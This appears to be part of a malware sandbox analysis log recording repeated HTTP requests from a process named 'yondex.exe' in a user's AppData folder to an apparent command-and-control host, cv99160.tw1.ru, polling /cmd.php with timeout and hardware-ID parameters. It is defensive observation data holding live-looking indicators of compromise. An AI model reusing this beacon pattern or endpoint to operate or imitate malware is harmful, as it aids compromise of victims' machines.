                                                                              2024-06-23 09:31:35 UTC357INHTTP/1.1 200 OK
                                                                              Server: nginx/1.24.0
                                                                              Date: Sun, 23 Jun 2024 09:31:35 GMT
                                                                              Content-Type: text/html; charset=UTF-8
                                                                              Content-Length: 0
                                                                              Connection: close
                                                                              Set-Cookie: PHPSESSID=9f86a2418592531e6d7043c5087f4e7e; path=/
                                                                              Expires: Thu, 19 Nov 1981 08:52:00 GMT
                                                                              Cache-Control: no-store, no-cache, must-revalidate, post-check=0, pre-check=0
                                                                              Pragma: no-cache


                                                                              Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                                              13192.168.2.44975292.53.96.1214437864C:\Users\user\AppData\Roaming\Sysfiles\yondex.exe
                                                                              TimestampBytes transferredDirectionData
                                                                              2024-06-23 09:31:36 UTC144OUTGET /cmd.php?timeout=1 HTTP/1.1
                                                                              User-Agent: Mozilla/5.0 (Windows NT 10.0; WOW64; rv:53.0) Gecko/20100101 Firefox/53.0
                                                                              Host: cv99160.tw1.ru
                                                                              2024-06-23 09:31:36 UTC357INHTTP/1.1 200 OK
                                                                              Server: nginx/1.24.0
                                                                              Date: Sun, 23 Jun 2024 09:31:36 GMT
                                                                              Content-Type: text/html; charset=UTF-8
                                                                              Content-Length: 1
                                                                              Connection: close
                                                                              Set-Cookie: PHPSESSID=81dfcf86240e6ca062b82884b38c9d0c; path=/
                                                                              Expires: Thu, 19 Nov 1981 08:52:00 GMT
                                                                              Cache-Control: no-store, no-cache, must-revalidate, post-check=0, pre-check=0
                                                                              Pragma: no-cache
                                                                              2024-06-23 09:31:36 UTC1INData Raw: 31
                                                                              Data Ascii: 1


                                                                              Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                                              14192.168.2.44975392.53.96.1214437864C:\Users\user\AppData\Roaming\Sysfiles\yondex.exe
                                                                              TimestampBytes transferredDirectionData
                                                                              2024-06-23 09:31:37 UTC148OUTGET /cmd.php?hwid=B81A4609 HTTP/1.1
                                                                              User-Agent: Mozilla/5.0 (Windows NT 10.0; WOW64; rv:53.0) Gecko/20100101 Firefox/53.0
                                                                              Host: cv99160.tw1.ru
                                                                              2024-06-23 09:31:38 UTC357INHTTP/1.1 200 OK
                                                                              Server: nginx/1.24.0
                                                                              Date: Sun, 23 Jun 2024 09:31:37 GMT
                                                                              Content-Type: text/html; charset=UTF-8
                                                                              Content-Length: 0
                                                                              Connection: close
                                                                              Set-Cookie: PHPSESSID=d6c522932764ed2efad9e948a1532833; path=/
                                                                              Expires: Thu, 19 Nov 1981 08:52:00 GMT
                                                                              Cache-Control: no-store, no-cache, must-revalidate, post-check=0, pre-check=0
                                                                              Pragma: no-cache


                                                                              Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                                              15192.168.2.44975592.53.96.1214438064C:\Users\user\AppData\Roaming\Sysfiles\yondex.exe
                                                                              TimestampBytes transferredDirectionData
                                                                              2024-06-23 09:31:44 UTC172OUTGET /cmd.php?hwid=B81A4609 HTTP/1.1
                                                                              User-Agent: Mozilla/5.0 (Windows NT 10.0; WOW64; rv:53.0) Gecko/20100101 Firefox/53.0
                                                                              Host: cv99160.tw1.ru
                                                                              Connection: Keep-Alive
                                                                              2024-06-23 09:31:44 UTC357INHTTP/1.1 200 OK
                                                                              Server: nginx/1.24.0
                                                                              Date: Sun, 23 Jun 2024 09:31:44 GMT
                                                                              Content-Type: text/html; charset=UTF-8
                                                                              Content-Length: 0
                                                                              Connection: close
                                                                              Set-Cookie: PHPSESSID=7742708f929fc95c30887176d368f4ef; path=/
                                                                              Expires: Thu, 19 Nov 1981 08:52:00 GMT
                                                                              Cache-Control: no-store, no-cache, must-revalidate, post-check=0, pre-check=0
                                                                              Pragma: no-cache


                                                                              Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                                              16192.168.2.44975692.53.96.1214438064C:\Users\user\AppData\Roaming\Sysfiles\yondex.exe
                                                                              TimestampBytes transferredDirectionData
                                                                              2024-06-23 09:31:45 UTC144OUTGET /cmd.php?timeout=1 HTTP/1.1
                                                                              User-Agent: Mozilla/5.0 (Windows NT 10.0; WOW64; rv:53.0) Gecko/20100101 Firefox/53.0
                                                                              Host: cv99160.tw1.ru
                                                                              2024-06-23 09:31:45 UTC357INHTTP/1.1 200 OK
                                                                              Server: nginx/1.24.0
                                                                              Date: Sun, 23 Jun 2024 09:31:45 GMT
                                                                              Content-Type: text/html; charset=UTF-8
                                                                              Content-Length: 1
                                                                              Connection: close
                                                                              Set-Cookie: PHPSESSID=9b430adee248e7127b8d2d074aa89491; path=/
                                                                              Expires: Thu, 19 Nov 1981 08:52:00 GMT
                                                                              Cache-Control: no-store, no-cache, must-revalidate, post-check=0, pre-check=0
                                                                              Pragma: no-cache
                                                                              2024-06-23 09:31:45 UTC1INData Raw: 31
                                                                              Data Ascii: 1


                                                                              Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                                              17192.168.2.44975792.53.96.1214438064C:\Users\user\AppData\Roaming\Sysfiles\yondex.exe
                                                                              TimestampBytes transferredDirectionData
                                                                              2024-06-23 09:31:46 UTC148OUTGET /cmd.php?hwid=B81A4609 HTTP/1.1
                                                                              User-Agent: Mozilla/5.0 (Windows NT 10.0; WOW64; rv:53.0) Gecko/20100101 Firefox/53.0
                                                                              Host: cv99160.tw1.ru
                                                                              2024-06-23 09:31:47 UTC357INHTTP/1.1 200 OK
                                                                              Server: nginx/1.24.0
                                                                              Date: Sun, 23 Jun 2024 09:31:47 GMT
                                                                              Content-Type: text/html; charset=UTF-8
                                                                              Content-Length: 0
                                                                              Connection: close
                                                                              Set-Cookie: PHPSESSID=8d0d6877c4dd8b62bf2c0b84164d63c0; path=/
                                                                              Expires: Thu, 19 Nov 1981 08:52:00 GMT
                                                                              Cache-Control: no-store, no-cache, must-revalidate, post-check=0, pre-check=0
                                                                              Pragma: no-cache


                                                                              Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                                              18192.168.2.44975892.53.96.1214438064C:\Users\user\AppData\Roaming\Sysfiles\yondex.exe
                                                                              TimestampBytes transferredDirectionData
                                                                              2024-06-23 09:31:48 UTC168OUTGET /cmd.php?timeout=1 HTTP/1.1
                                                                              User-Agent: Mozilla/5.0 (Windows NT 10.0; WOW64; rv:53.0) Gecko/20100101 Firefox/53.0
                                                                              Host: cv99160.tw1.ru
                                                                              Connection: Keep-Alive
                                                                              2024-06-23 09:31:48 UTC357INHTTP/1.1 200 OK
                                                                              Server: nginx/1.24.0
                                                                              Date: Sun, 23 Jun 2024 09:31:48 GMT
                                                                              Content-Type: text/html; charset=UTF-8
                                                                              Content-Length: 1
                                                                              Connection: close
                                                                              Set-Cookie: PHPSESSID=725865cc4b1d781343cfab94871c4564; path=/
                                                                              Expires: Thu, 19 Nov 1981 08:52:00 GMT
                                                                              Cache-Control: no-store, no-cache, must-revalidate, post-check=0, pre-check=0
                                                                              Pragma: no-cache
                                                                              2024-06-23 09:31:48 UTC1INData Raw: 31
                                                                              Data Ascii: 1


                                                                              Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                                              19192.168.2.44975992.53.96.1214438064C:\Users\user\AppData\Roaming\Sysfiles\yondex.exe
                                                                              TimestampBytes transferredDirectionData
                                                                              2024-06-23 09:31:49 UTC148OUTGET /cmd.php?hwid=B81A4609 HTTP/1.1
                                                                              User-Agent: Mozilla/5.0 (Windows NT 10.0; WOW64; rv:53.0) Gecko/20100101 Firefox/53.0
                                                                              Host: cv99160.tw1.ru
                                                                              2024-06-23 09:31:49 UTC357INHTTP/1.1 200 OK
                                                                              Server: nginx/1.24.0
                                                                              Date: Sun, 23 Jun 2024 09:31:49 GMT
                                                                              Content-Type: text/html; charset=UTF-8
                                                                              Content-Length: 0
                                                                              Connection: close
                                                                              Set-Cookie: PHPSESSID=ba11adf49876910b7d9b54aa916bdc77; path=/
                                                                              Expires: Thu, 19 Nov 1981 08:52:00 GMT
                                                                              Cache-Control: no-store, no-cache, must-revalidate, post-check=0, pre-check=0
                                                                              Pragma: no-cache


                                                                              Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                                              20192.168.2.44976092.53.96.1214438064C:\Users\user\AppData\Roaming\Sysfiles\yondex.exe
                                                                              TimestampBytes transferredDirectionData
                                                                              2024-06-23 09:31:50 UTC168OUTGET /cmd.php?timeout=1 HTTP/1.1
                                                                              User-Agent: Mozilla/5.0 (Windows NT 10.0; WOW64; rv:53.0) Gecko/20100101 Firefox/53.0
                                                                              Host: cv99160.tw1.ru
                                                                              Connection: Keep-Alive
                                                                              2024-06-23 09:31:50 UTC357INHTTP/1.1 200 OK
                                                                              Server: nginx/1.24.0
                                                                              Date: Sun, 23 Jun 2024 09:31:50 GMT
                                                                              Content-Type: text/html; charset=UTF-8
                                                                              Content-Length: 1
                                                                              Connection: close
                                                                              Set-Cookie: PHPSESSID=0efa7b9711a6b453b4cab730f7dbfa6a; path=/
                                                                              Expires: Thu, 19 Nov 1981 08:52:00 GMT
                                                                              Cache-Control: no-store, no-cache, must-revalidate, post-check=0, pre-check=0
                                                                              Pragma: no-cache
                                                                              2024-06-23 09:31:50 UTC1INData Raw: 31
                                                                              Data Ascii: 1


                                                                              Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                                              21192.168.2.44976192.53.96.1214438064C:\Users\user\AppData\Roaming\Sysfiles\yondex.exe
                                                                              TimestampBytes transferredDirectionData
                                                                              2024-06-23 09:31:51 UTC172OUTGET /cmd.php?hwid=B81A4609 HTTP/1.1
                                                                              User-Agent: Mozilla/5.0 (Windows NT 10.0; WOW64; rv:53.0) Gecko/20100101 Firefox/53.0
                                                                              Host: cv99160.tw1.ru
                                                                              Connection: Keep-Alive
                                                                              2024-06-23 09:31:51 UTC357INHTTP/1.1 200 OK
                                                                              Server: nginx/1.24.0
                                                                              Date: Sun, 23 Jun 2024 09:31:51 GMT
                                                                              Content-Type: text/html; charset=UTF-8
                                                                              Content-Length: 0
                                                                              Connection: close
                                                                              Set-Cookie: PHPSESSID=c5af589d184bf6c6ee88b6ea7b13590d; path=/
                                                                              Expires: Thu, 19 Nov 1981 08:52:00 GMT
                                                                              Cache-Control: no-store, no-cache, must-revalidate, post-check=0, pre-check=0
                                                                              Pragma: no-cache


                                                                              Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                                              22192.168.2.44976292.53.96.1214438064C:\Users\user\AppData\Roaming\Sysfiles\yondex.exe
                                                                              TimestampBytes transferredDirectionData
                                                                              2024-06-23 09:31:52 UTC168OUTGET /cmd.php?timeout=1 HTTP/1.1
                                                                              User-Agent: Mozilla/5.0 (Windows NT 10.0; WOW64; rv:53.0) Gecko/20100101 Firefox/53.0
                                                                              Host: cv99160.tw1.ru
                                                                              Connection: Keep-Alive
                                                                              2024-06-23 09:31:53 UTC357INHTTP/1.1 200 OK
                                                                              Server: nginx/1.24.0
                                                                              Date: Sun, 23 Jun 2024 09:31:52 GMT
                                                                              Content-Type: text/html; charset=UTF-8
                                                                              Content-Length: 1
                                                                              Connection: close
                                                                              Set-Cookie: PHPSESSID=d4b72a0e747e64b9fda7a8f2a161bf03; path=/
                                                                              Expires: Thu, 19 Nov 1981 08:52:00 GMT
                                                                              Cache-Control: no-store, no-cache, must-revalidate, post-check=0, pre-check=0
                                                                              Pragma: no-cache
                                                                              2024-06-23 09:31:53 UTC1INData Raw: 31
                                                                              Data Ascii: 1


                                                                              Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                                              23192.168.2.44976392.53.96.1214438064C:\Users\user\AppData\Roaming\Sysfiles\yondex.exe
                                                                              TimestampBytes transferredDirectionData
                                                                              2024-06-23 09:31:53 UTC148OUTGET /cmd.php?hwid=B81A4609 HTTP/1.1
                                                                              User-Agent: Mozilla/5.0 (Windows NT 10.0; WOW64; rv:53.0) Gecko/20100101 Firefox/53.0
                                                                              Host: cv99160.tw1.ru
                                                                              2024-06-23 09:31:54 UTC357INHTTP/1.1 200 OK
                                                                              Server: nginx/1.24.0
                                                                              Date: Sun, 23 Jun 2024 09:31:54 GMT
                                                                              Content-Type: text/html; charset=UTF-8
                                                                              Content-Length: 0
                                                                              Connection: close
                                                                              Set-Cookie: PHPSESSID=ce837ff9705006dd6426b96a52834a54; path=/
                                                                              Expires: Thu, 19 Nov 1981 08:52:00 GMT
                                                                              Cache-Control: no-store, no-cache, must-revalidate, post-check=0, pre-check=0
                                                                              Pragma: no-cache


                                                                              Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                                              24192.168.2.44976492.53.96.1214438064C:\Users\user\AppData\Roaming\Sysfiles\yondex.exe
                                                                              TimestampBytes transferredDirectionData
                                                                              2024-06-23 09:31:54 UTC168OUTGET /cmd.php?timeout=1 HTTP/1.1
                                                                              User-Agent: Mozilla/5.0 (Windows NT 10.0; WOW64; rv:53.0) Gecko/20100101 Firefox/53.0
                                                                              Host: cv99160.tw1.ru
                                                                              Connection: Keep-Alive
                                                                              2024-06-23 09:31:55 UTC357INHTTP/1.1 200 OK
                                                                              Server: nginx/1.24.0
                                                                              Date: Sun, 23 Jun 2024 09:31:55 GMT
                                                                              Content-Type: text/html; charset=UTF-8
                                                                              Content-Length: 1
                                                                              Connection: close
                                                                              Set-Cookie: PHPSESSID=a9dff7b54bbca3d2b214932852b1a6e1; path=/
                                                                              Expires: Thu, 19 Nov 1981 08:52:00 GMT
                                                                              Cache-Control: no-store, no-cache, must-revalidate, post-check=0, pre-check=0
                                                                              Pragma: no-cache
                                                                              2024-06-23 09:31:55 UTC1INData Raw: 31
                                                                              Data Ascii: 1


                                                                              Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                                              25192.168.2.44976592.53.96.1214438064C:\Users\user\AppData\Roaming\Sysfiles\yondex.exe
                                                                              TimestampBytes transferredDirectionData
                                                                              2024-06-23 09:31:56 UTC172OUTGET /cmd.php?hwid=B81A4609 HTTP/1.1
                                                                              User-Agent: Mozilla/5.0 (Windows NT 10.0; WOW64; rv:53.0) Gecko/20100101 Firefox/53.0
                                                                              Host: cv99160.tw1.ru
                                                                              Connection: Keep-Alive
                                                                              2024-06-23 09:31:56 UTC357INHTTP/1.1 200 OK
                                                                              Server: nginx/1.24.0
                                                                              Date: Sun, 23 Jun 2024 09:31:56 GMT
                                                                              Content-Type: text/html; charset=UTF-8
                                                                              Content-Length: 0
                                                                              Connection: close
                                                                              Set-Cookie: PHPSESSID=58085a72110a473141e826763113d59b; path=/
                                                                              Expires: Thu, 19 Nov 1981 08:52:00 GMT
                                                                              Cache-Control: no-store, no-cache, must-revalidate, post-check=0, pre-check=0
                                                                              Pragma: no-cache


                                                                              Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                                              26192.168.2.44976692.53.96.1214438064C:\Users\user\AppData\Roaming\Sysfiles\yondex.exe
                                                                              TimestampBytes transferredDirectionData
                                                                              2024-06-23 09:31:57 UTC168OUTGET /cmd.php?timeout=1 HTTP/1.1
                                                                              User-Agent: Mozilla/5.0 (Windows NT 10.0; WOW64; rv:53.0) Gecko/20100101 Firefox/53.0
                                                                              Host: cv99160.tw1.ru
                                                                              Connection: Keep-Alive
                                                                              2024-06-23 09:31:57 UTC357INHTTP/1.1 200 OK
                                                                              Server: nginx/1.24.0
                                                                              Date: Sun, 23 Jun 2024 09:31:57 GMT
                                                                              Content-Type: text/html; charset=UTF-8
                                                                              Content-Length: 1
                                                                              Connection: close
                                                                              Set-Cookie: PHPSESSID=76d8eaaaeb562003de30c4bf08daa58e; path=/
                                                                              Expires: Thu, 19 Nov 1981 08:52:00 GMT
                                                                              Cache-Control: no-store, no-cache, must-revalidate, post-check=0, pre-check=0
                                                                              Pragma: no-cache
                                                                              2024-06-23 09:31:57 UTC1INData Raw: 31
                                                                              Data Ascii: 1


                                                                              Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                                              27192.168.2.44976792.53.96.1214438064C:\Users\user\AppData\Roaming\Sysfiles\yondex.exe
                                                                              TimestampBytes transferredDirectionData
                                                                              2024-06-23 09:31:58 UTC172OUTGET /cmd.php?hwid=B81A4609 HTTP/1.1
                                                                              User-Agent: Mozilla/5.0 (Windows NT 10.0; WOW64; rv:53.0) Gecko/20100101 Firefox/53.0
                                                                              Host: cv99160.tw1.ru
                                                                              Connection: Keep-Alive
                                                                              2024-06-23 09:31:58 UTC357INHTTP/1.1 200 OK
                                                                              Server: nginx/1.24.0
                                                                              Date: Sun, 23 Jun 2024 09:31:58 GMT
                                                                              Content-Type: text/html; charset=UTF-8
                                                                              Content-Length: 0
                                                                              Connection: close
                                                                              Set-Cookie: PHPSESSID=61e510ebcd75a24f25acf8bf47177d17; path=/
                                                                              Expires: Thu, 19 Nov 1981 08:52:00 GMT
                                                                              Cache-Control: no-store, no-cache, must-revalidate, post-check=0, pre-check=0
                                                                              Pragma: no-cache


                                                                              Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                                              28192.168.2.44976892.53.96.1214438064C:\Users\user\AppData\Roaming\Sysfiles\yondex.exe
                                                                              TimestampBytes transferredDirectionData
                                                                              2024-06-23 09:31:59 UTC168OUTGET /cmd.php?timeout=1 HTTP/1.1
                                                                              User-Agent: Mozilla/5.0 (Windows NT 10.0; WOW64; rv:53.0) Gecko/20100101 Firefox/53.0
                                                                              Host: cv99160.tw1.ru
                                                                              Connection: Keep-Alive
                                                                              2024-06-23 09:32:00 UTC357INHTTP/1.1 200 OK
                                                                              Server: nginx/1.24.0
                                                                              Date: Sun, 23 Jun 2024 09:31:59 GMT
                                                                              Content-Type: text/html; charset=UTF-8
                                                                              Content-Length: 1
                                                                              Connection: close
                                                                              Set-Cookie: PHPSESSID=27df4d8c953d802bae13339e144b354a; path=/
                                                                              Expires: Thu, 19 Nov 1981 08:52:00 GMT
                                                                              Cache-Control: no-store, no-cache, must-revalidate, post-check=0, pre-check=0
                                                                              Pragma: no-cache
                                                                              2024-06-23 09:32:00 UTC1INData Raw: 31
                                                                              Data Ascii: 1


                                                                              Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                                              29192.168.2.44976992.53.96.1214438064C:\Users\user\AppData\Roaming\Sysfiles\yondex.exe
                                                                              TimestampBytes transferredDirectionData
                                                                              2024-06-23 09:32:00 UTC172OUTGET /cmd.php?hwid=B81A4609 HTTP/1.1
                                                                              User-Agent: Mozilla/5.0 (Windows NT 10.0; WOW64; rv:53.0) Gecko/20100101 Firefox/53.0
                                                                              Host: cv99160.tw1.ru
                                                                              Connection: Keep-Alive
                                                                              2024-06-23 09:32:01 UTC357INHTTP/1.1 200 OK
                                                                              Server: nginx/1.24.0
                                                                              Date: Sun, 23 Jun 2024 09:32:01 GMT
                                                                              Content-Type: text/html; charset=UTF-8
                                                                              Content-Length: 0
                                                                              Connection: close
                                                                              Set-Cookie: PHPSESSID=868df4a8cf63074e3a021a1fa56f6178; path=/
                                                                              Expires: Thu, 19 Nov 1981 08:52:00 GMT
                                                                              Cache-Control: no-store, no-cache, must-revalidate, post-check=0, pre-check=0
                                                                              Pragma: no-cache


                                                                              Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                                              30192.168.2.44977092.53.96.1214438064C:\Users\user\AppData\Roaming\Sysfiles\yondex.exe
                                                                              TimestampBytes transferredDirectionData
                                                                              2024-06-23 09:32:02 UTC168OUTGET /cmd.php?timeout=1 HTTP/1.1
                                                                              User-Agent: Mozilla/5.0 (Windows NT 10.0; WOW64; rv:53.0) Gecko/20100101 Firefox/53.0
                                                                              Host: cv99160.tw1.ru
                                                                              Connection: Keep-Alive
                                                                              2024-06-23 09:32:02 UTC357INHTTP/1.1 200 OK
                                                                              Server: nginx/1.24.0
                                                                              Date: Sun, 23 Jun 2024 09:32:02 GMT
                                                                              Content-Type: text/html; charset=UTF-8
                                                                              Content-Length: 1
                                                                              Connection: close
                                                                              Set-Cookie: PHPSESSID=06601e1d060b0ca340949d0c219c243d; path=/
                                                                              Expires: Thu, 19 Nov 1981 08:52:00 GMT
                                                                              Cache-Control: no-store, no-cache, must-revalidate, post-check=0, pre-check=0
                                                                              Pragma: no-cache
                                                                              2024-06-23 09:32:02 UTC1INData Raw: 31
                                                                              Data Ascii: 1


                                                                              Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                                              31192.168.2.44977192.53.96.1214438064C:\Users\user\AppData\Roaming\Sysfiles\yondex.exe
                                                                              TimestampBytes transferredDirectionData
                                                                              2024-06-23 09:32:03 UTC172OUTGET /cmd.php?hwid=B81A4609 HTTP/1.1
                                                                              User-Agent: Mozilla/5.0 (Windows NT 10.0; WOW64; rv:53.0) Gecko/20100101 Firefox/53.0
                                                                              Host: cv99160.tw1.ru
                                                                              Connection: Keep-Alive
                                                                              2024-06-23 09:32:03 UTC357INHTTP/1.1 200 OK
                                                                              Server: nginx/1.24.0
                                                                              Date: Sun, 23 Jun 2024 09:32:03 GMT
                                                                              Content-Type: text/html; charset=UTF-8
                                                                              Content-Length: 0
                                                                              Connection: close
                                                                              Set-Cookie: PHPSESSID=fcf791a709f1de5c84a486dc0c552501; path=/
                                                                              Expires: Thu, 19 Nov 1981 08:52:00 GMT
                                                                              Cache-Control: no-store, no-cache, must-revalidate, post-check=0, pre-check=0
                                                                              Pragma: no-cache


                                                                              Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                                              32192.168.2.44977292.53.96.1214438064C:\Users\user\AppData\Roaming\Sysfiles\yondex.exe
                                                                              TimestampBytes transferredDirectionData
                                                                              2024-06-23 09:32:04 UTC168OUTGET /cmd.php?timeout=1 HTTP/1.1
                                                                              User-Agent: Mozilla/5.0 (Windows NT 10.0; WOW64; rv:53.0) Gecko/20100101 Firefox/53.0
                                                                              Host: cv99160.tw1.ru
                                                                              Connection: Keep-Alive
                                                                              2024-06-23 09:32:04 UTC357INHTTP/1.1 200 OK
                                                                              Server: nginx/1.24.0
                                                                              Date: Sun, 23 Jun 2024 09:32:04 GMT
                                                                              Content-Type: text/html; charset=UTF-8
                                                                              Content-Length: 1
                                                                              Connection: close
                                                                              Set-Cookie: PHPSESSID=89fca66fb150b46e0d76eff81ea9d518; path=/
                                                                              Expires: Thu, 19 Nov 1981 08:52:00 GMT
                                                                              Cache-Control: no-store, no-cache, must-revalidate, post-check=0, pre-check=0
                                                                              Pragma: no-cache
                                                                              2024-06-23 09:32:04 UTC1INData Raw: 31
                                                                              Data Ascii: 1


                                                                              Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                                              33192.168.2.44977392.53.96.1214438064C:\Users\user\AppData\Roaming\Sysfiles\yondex.exe
                                                                              TimestampBytes transferredDirectionData
                                                                              2024-06-23 09:32:05 UTC172OUTGET /cmd.php?hwid=B81A4609 HTTP/1.1
                                                                              User-Agent: Mozilla/5.0 (Windows NT 10.0; WOW64; rv:53.0) Gecko/20100101 Firefox/53.0
                                                                              Host: cv99160.tw1.ru
                                                                              Connection: Keep-Alive
                                                                              2024-06-23 09:32:05 UTC357INHTTP/1.1 200 OK
                                                                              Server: nginx/1.24.0
                                                                              Date: Sun, 23 Jun 2024 09:32:05 GMT
                                                                              Content-Type: text/html; charset=UTF-8
                                                                              Content-Length: 0
                                                                              Connection: close
                                                                              Set-Cookie: PHPSESSID=ddffc366ee96ecf1c340c678129dc348; path=/
                                                                              Expires: Thu, 19 Nov 1981 08:52:00 GMT
                                                                              Cache-Control: no-store, no-cache, must-revalidate, post-check=0, pre-check=0
                                                                              Pragma: no-cache


                                                                              Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                                              34192.168.2.44977492.53.96.1214438064C:\Users\user\AppData\Roaming\Sysfiles\yondex.exe
                                                                              TimestampBytes transferredDirectionData
                                                                              2024-06-23 09:32:06 UTC144OUTGET /cmd.php?timeout=1 HTTP/1.1
                                                                              User-Agent: Mozilla/5.0 (Windows NT 10.0; WOW64; rv:53.0) Gecko/20100101 Firefox/53.0
                                                                              Host: cv99160.tw1.ru
                                                                              2024-06-23 09:32:07 UTC357INHTTP/1.1 200 OK
                                                                              Server: nginx/1.24.0
                                                                              Date: Sun, 23 Jun 2024 09:32:06 GMT
                                                                              Content-Type: text/html; charset=UTF-8
                                                                              Content-Length: 1
                                                                              Connection: close
                                                                              Set-Cookie: PHPSESSID=9a87ff128ed3302af94e8eda0e0ebd88; path=/
                                                                              Expires: Thu, 19 Nov 1981 08:52:00 GMT
                                                                              Cache-Control: no-store, no-cache, must-revalidate, post-check=0, pre-check=0
                                                                              Pragma: no-cache
                                                                              2024-06-23 09:32:07 UTC1INData Raw: 31
                                                                              Data Ascii: 1


                                                                              Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                                              35192.168.2.44977692.53.96.1214438064C:\Users\user\AppData\Roaming\Sysfiles\yondex.exe
                                                                              TimestampBytes transferredDirectionData
                                                                              2024-06-23 09:32:08 UTC172OUTGET /cmd.php?hwid=B81A4609 HTTP/1.1
                                                                              User-Agent: Mozilla/5.0 (Windows NT 10.0; WOW64; rv:53.0) Gecko/20100101 Firefox/53.0
                                                                              Host: cv99160.tw1.ru
                                                                              Connection: Keep-Alive
                                                                              2024-06-23 09:32:08 UTC357INHTTP/1.1 200 OK
                                                                              Server: nginx/1.24.0
                                                                              Date: Sun, 23 Jun 2024 09:32:08 GMT
                                                                              Content-Type: text/html; charset=UTF-8
                                                                              Content-Length: 0
                                                                              Connection: close
                                                                              Set-Cookie: PHPSESSID=f2fad631763035d20f5f1e83e25cdcb2; path=/
                                                                              Expires: Thu, 19 Nov 1981 08:52:00 GMT
                                                                              Cache-Control: no-store, no-cache, must-revalidate, post-check=0, pre-check=0
                                                                              Pragma: no-cache


                                                                              Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                                              36192.168.2.44977792.53.96.1214438064C:\Users\user\AppData\Roaming\Sysfiles\yondex.exe
                                                                              TimestampBytes transferredDirectionData
                                                                              2024-06-23 09:32:09 UTC144OUTGET /cmd.php?timeout=1 HTTP/1.1
                                                                              User-Agent: Mozilla/5.0 (Windows NT 10.0; WOW64; rv:53.0) Gecko/20100101 Firefox/53.0
                                                                              Host: cv99160.tw1.ru
                                                                              2024-06-23 09:32:09 UTC357INHTTP/1.1 200 OK
                                                                              Server: nginx/1.24.0
                                                                              Date: Sun, 23 Jun 2024 09:32:09 GMT
                                                                              Content-Type: text/html; charset=UTF-8
                                                                              Content-Length: 1
                                                                              Connection: close
                                                                              Set-Cookie: PHPSESSID=7ec285fc91bbaf066487ca07e31a92d5; path=/
                                                                              Expires: Thu, 19 Nov 1981 08:52:00 GMT
                                                                              Cache-Control: no-store, no-cache, must-revalidate, post-check=0, pre-check=0
                                                                              Pragma: no-cache
                                                                              2024-06-23 09:32:09 UTC1INData Raw: 31
                                                                              Data Ascii: 1


                                                                              Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                                              37192.168.2.44977892.53.96.1214438064C:\Users\user\AppData\Roaming\Sysfiles\yondex.exe
                                                                              TimestampBytes transferredDirectionData
                                                                              2024-06-23 09:32:10 UTC172OUTGET /cmd.php?hwid=B81A4609 HTTP/1.1
                                                                              User-Agent: Mozilla/5.0 (Windows NT 10.0; WOW64; rv:53.0) Gecko/20100101 Firefox/53.0
                                                                              Host: cv99160.tw1.ru
                                                                              Connection: Keep-Alive
                                                                              2024-06-23 09:32:10 UTC357INHTTP/1.1 200 OK
                                                                              Server: nginx/1.24.0
                                                                              Date: Sun, 23 Jun 2024 09:32:10 GMT
                                                                              Content-Type: text/html; charset=UTF-8
                                                                              Content-Length: 0
                                                                              Connection: close
                                                                              Set-Cookie: PHPSESSID=4abb93b651bc880cd4bbaae3d4db24e1; path=/
                                                                              Expires: Thu, 19 Nov 1981 08:52:00 GMT
                                                                              Cache-Control: no-store, no-cache, must-revalidate, post-check=0, pre-check=0
                                                                              Pragma: no-cache


                                                                              Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                                              38192.168.2.44977992.53.96.1214438064C:\Users\user\AppData\Roaming\Sysfiles\yondex.exe
                                                                              TimestampBytes transferredDirectionData
                                                                              2024-06-23 09:32:11 UTC144OUTGET /cmd.php?timeout=1 HTTP/1.1
                                                                              User-Agent: Mozilla/5.0 (Windows NT 10.0; WOW64; rv:53.0) Gecko/20100101 Firefox/53.0
                                                                              Host: cv99160.tw1.ru
                                                                              2024-06-23 09:32:11 UTC357INHTTP/1.1 200 OK
                                                                              Server: nginx/1.24.0
                                                                              Date: Sun, 23 Jun 2024 09:32:11 GMT
                                                                              Content-Type: text/html; charset=UTF-8
                                                                              Content-Length: 1
                                                                              Connection: close
                                                                              Set-Cookie: PHPSESSID=9e992b4148c6f9d563d7769be7fc9b2b; path=/
                                                                              Expires: Thu, 19 Nov 1981 08:52:00 GMT
                                                                              Cache-Control: no-store, no-cache, must-revalidate, post-check=0, pre-check=0
                                                                              Pragma: no-cache
                                                                              2024-06-23 09:32:11 UTC1INData Raw: 31
                                                                              Data Ascii: 1


                                                                              Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                                              39192.168.2.44978092.53.96.1214438064C:\Users\user\AppData\Roaming\Sysfiles\yondex.exe
                                                                              TimestampBytes transferredDirectionData
                                                                              2024-06-23 09:32:12 UTC172OUTGET /cmd.php?hwid=B81A4609 HTTP/1.1
                                                                              User-Agent: Mozilla/5.0 (Windows NT 10.0; WOW64; rv:53.0) Gecko/20100101 Firefox/53.0
                                                                              Host: cv99160.tw1.ru
                                                                              Connection: Keep-Alive
                                                                              2024-06-23 09:32:13 UTC357INHTTP/1.1 200 OK
                                                                              Server: nginx/1.24.0
                                                                              Date: Sun, 23 Jun 2024 09:32:13 GMT
                                                                              Content-Type: text/html; charset=UTF-8
                                                                              Content-Length: 0
                                                                              Connection: close
                                                                              Set-Cookie: PHPSESSID=f4b6cd3bc3efa7a422718064a031300e; path=/
